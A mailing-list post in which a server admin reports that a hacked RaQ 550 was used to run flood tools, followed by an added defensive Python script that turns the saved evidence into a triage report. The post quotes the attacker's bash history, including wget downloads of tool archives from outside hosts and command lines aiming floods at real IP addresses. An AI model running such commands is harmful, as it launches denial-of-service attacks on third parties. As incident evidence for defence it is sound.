
[cobalt-security] raq 550 hacked



Hello,

This weekend it looks like a RaQ 550 of mine was hacked.
I tracked some processes that were flooding.
The program was called vadimII.

It was run under the name of a user that had SSH access.
When I blocked this user, it started a day later with another user.

These 2 users are from different sites on the same machine,
but these 2 users are from the same person.
Tracking the IPs I came out in Washington,
but the user is Dutch, so it looks like someone hacked his computer to
retrieve his passwords?

Is there a way to check whether the RaQ is infected, or will blocking this
user from SSH be enough?
The program was running in the /home/tmp dir, in the directory flood; a list
is below.
The file broadcast.txt has 2102 IPs in it.

I also have saved the bash history of the 2 users.
There are several programs that were downloaded to my server.
I shortened the bash history to the programs that were downloaded, below this mail.

Please advise.

----------
-rwxr-xr-x 1 xxx users 22446 Feb 9 2001 alpha
-rwxr-xr-x 1 xxx users 23521 Aug 17 2000 bloop
-rw-r--r-- 1 xxx users 31909 Aug 22 2001 broadcast.txt
-rwxr-xr-x 1 xxx users 26981 May 9 01:10 cw
-rwxr-xr-x 1 xxx users 2250 Apr 11 2001 da.sh
-rwxr-xr-x 1 xxx users 24747 Mar 10 1996 juno
-rwxr-xr-x 1 xxx users 25285 Aug 17 2000 nestea
-rwxr-xr-x 1 xxx users 24577 Oct 3 2000 overdrop
-rwxr-xr-x 1 xxx users 22803 Oct 17 2000 rc8
-rwxr-xr-x 1 xxx users 28910 Sep 7 2000 s
-rwxr-xr-x 1 xxx users 24786 Mar 10 1996 sl
-rwxr-xr-x 1 xxx users 17027 Feb 9 2001 sl2
-rwxr-xr-x 1 xxx users 17027 Mar 2 2001 sl3
-rwxr-xr-x 1 xxx users 17027 Aug 22 2001 slice2
-rwxr-xr-x 1 xxx users 14883 May 13 2001 slice3
-rwxr-xr-x 1 xxx users 33962 Oct 17 2000 smack
-rwxr-xr-x 1 xxx users 31558 Feb 18 2001 smurf5
-rwxr-xr-x 1 xxx users 39382 Sep 7 2001 smurf6
-rw-r--r-- 1 xxx users 19008 Aug 22 2001 smurf6-linux+LPG.c
-rwxr-xr-x 1 xxx users 22158 Aug 6 2000 stealth
-rwxr-xr-x 1 xxx users 15087 May 13 2001 stream
-rwxr-xr-x 1 xxx users 15151 May 13 2001 stream2
-rwxr-xr-x 1 xxx users 23011 Jul 10 00:07 super
-rwxr-xr-x 1 xxx users 23671 May 13 2001 synhose
-rwxr-xr-x 1 xxx users 26449 Feb 7 1996 synk
-rwxr-xr-x 1 xxx users 15687 May 13 2001 synk7
-rwxr-xr-x 1 xxx users 16519 May 13 2001 synsend
-rwxr-xr-x 1 xxx users 23587 May 13 2001 trash
-rwxr-xr-x 1 xxx users 26252 May 13 2001 trash2
-rwxr-xr-x 1 xxx users 22741 Nov 8 2000 udp
-rwxr-xr-x 1 xxx users 22446 Aug 22 2001 vadimI
-rwxr-xr-x 1 xxx users 2635 Aug 22 2001 vadimI.c
-rwxr-xr-x 1 xxx users 23414 Jun 25 21:52 vadimII
-rwxr-xr-x 1 xxx users 13607 May 13 2001 xdestroy
-rwxr-xr-x 1 xxx users 15119 May 13 2001 xshock

-----
bash history
wget www.ps-lov.us/pizda.tgz
wget snow.prohosting.com/muiemuie/p.tar.gz
wget snow.prohosting.com/muiemuie/p.tgz
wget snow.prohosting.com/muiemuie/km3.tgz
wget 65.113.119.133/muiemuie/km3.tgz

It runs programs like
./super 69.65.48.23 53 nasa.gov
./vadimII 210.0.204.185 53 100000000000000000000000000000000000000 0
./cw 210.0.204.185
./stealth 210.0.204.185 6500000000000
./super 64.207.19.6 53 nasa.gov
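The post above saves three kinds of evidence: the `ls -l` listing of the tool directory, the trimmed bash history, and the command lines that were observed. The script below is an added example, not code from the cobalt-security list or from Cobalt, that turns exactly that evidence into a summary a defender can act on: which hosts the tool archives were fetched from (so they can be blocked and reported), which files are compiled binaries versus C sources or data, and which destination addresses the tools were pointed at (so upstream and abuse contacts can be notified and egress filtered). The sample input is a subset of the listing and history quoted in the post; the `curl` handling and the owner-execute-bit test are my own simplifying assumptions.

```python
"""Evidence-triage helper for the incident described above (added example).

Parses the artifacts the poster saved: an `ls -l` listing of the flood tool
directory, the trimmed bash history, and the observed command lines.
"""
import re
from urllib.parse import urlsplit

# Constructed sample input: a subset of the `ls -l` listing quoted in the post.
LS_LISTING = """\
-rwxr-xr-x 1 xxx users 22446 Feb 9 2001 alpha
-rw-r--r-- 1 xxx users 31909 Aug 22 2001 broadcast.txt
-rwxr-xr-x 1 xxx users 26981 May 9 01:10 cw
-rwxr-xr-x 1 xxx users 39382 Sep 7 2001 smurf6
-rw-r--r-- 1 xxx users 19008 Aug 22 2001 smurf6-linux+LPG.c
-rwxr-xr-x 1 xxx users 2635 Aug 22 2001 vadimI.c
-rwxr-xr-x 1 xxx users 23414 Jun 25 21:52 vadimII
-rwxr-xr-x 1 xxx users 15119 May 13 2001 xshock
"""

# Constructed sample input: the trimmed bash history quoted in the post.
BASH_HISTORY = """\
wget www.ps-lov.us/pizda.tgz
wget snow.prohosting.com/muiemuie/p.tar.gz
wget snow.prohosting.com/muiemuie/p.tgz
wget snow.prohosting.com/muiemuie/km3.tgz
wget 65.113.119.133/muiemuie/km3.tgz
"""

# Constructed sample input: the command lines the poster observed.
COMMANDS = """\
./super 69.65.48.23 53 nasa.gov
./vadimII 210.0.204.185 53 100000000000000000000000000000000000000 0
./cw 210.0.204.185
./stealth 210.0.204.185 6500000000000
./super 64.207.19.6 53 nasa.gov
"""

# One `ls -l` line: mode, link count, owner, group, size, mtime, name.
LS_RE = re.compile(
    r"^(?P<mode>[-dlrwxst]{10})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+"
    r"(?P<size>\d+)\s+(?P<mtime>\w{3}\s+\d+\s+[\d:]+)\s+(?P<name>.+)$"
)


def parse_listing(text):
    """Return one dict per `ls -l` line; lines that do not parse are skipped."""
    entries = []
    for line in text.splitlines():
        m = LS_RE.match(line.strip())
        if m:
            entry = m.groupdict()
            entry["size"] = int(entry["size"])
            entries.append(entry)
    return entries


def classify(entries):
    """Split entries into binaries, C sources and data files.

    Assumption: a .c suffix marks a source even when it carries an execute
    bit (vadimI.c in the post); otherwise the owner execute bit decides.
    """
    out = {"executable": [], "source": [], "data": []}
    for e in entries:
        if e["name"].endswith(".c"):
            out["source"].append(e["name"])
        elif "x" in e["mode"][1:4]:
            out["executable"].append(e["name"])
        else:
            out["data"].append(e["name"])
    return out


def download_sources(history):
    """Hosts the archives were fetched from (wget lines; curl is an assumption)."""
    hosts = set()
    for line in history.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0] in ("wget", "curl"):
            url = parts[-1]
            if "://" not in url:  # bare host/path as in the post
                url = "http://" + url
            hosts.add(urlsplit(url).hostname)
    return hosts


def flood_targets(commands):
    """Map each tool that was run to the destination addresses given to it."""
    targets = {}
    for line in commands.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0].startswith("./"):
            targets.setdefault(parts[0][2:], set()).add(parts[1])
    return targets


def triage_report(listing=LS_LISTING, history=BASH_HISTORY, commands=COMMANDS):
    """Summary for the incident record and for abuse notifications."""
    files = classify(parse_listing(listing))
    return {
        "download_hosts": sorted(download_sources(history)),
        "binaries": sorted(files["executable"]),
        "sources": sorted(files["source"]),
        "data": sorted(files["data"]),
        "targets": sorted({t for ts in flood_targets(commands).values() for t in ts}),
    }


if __name__ == "__main__":
    for key, value in triage_report().items():
        print(f"{key}: {', '.join(value)}")
```

Run it against the full listing and history to get the complete set of hosts and destinations to report. Note that an empty result from a scan of home directories does not answer the poster's question about whether the RaQ itself is infected: a tool directory under a user's home shows what the compromised accounts were used for, not whether root was obtained, so the system packages should still be checked against known-good checksums or the box rebuilt from clean media.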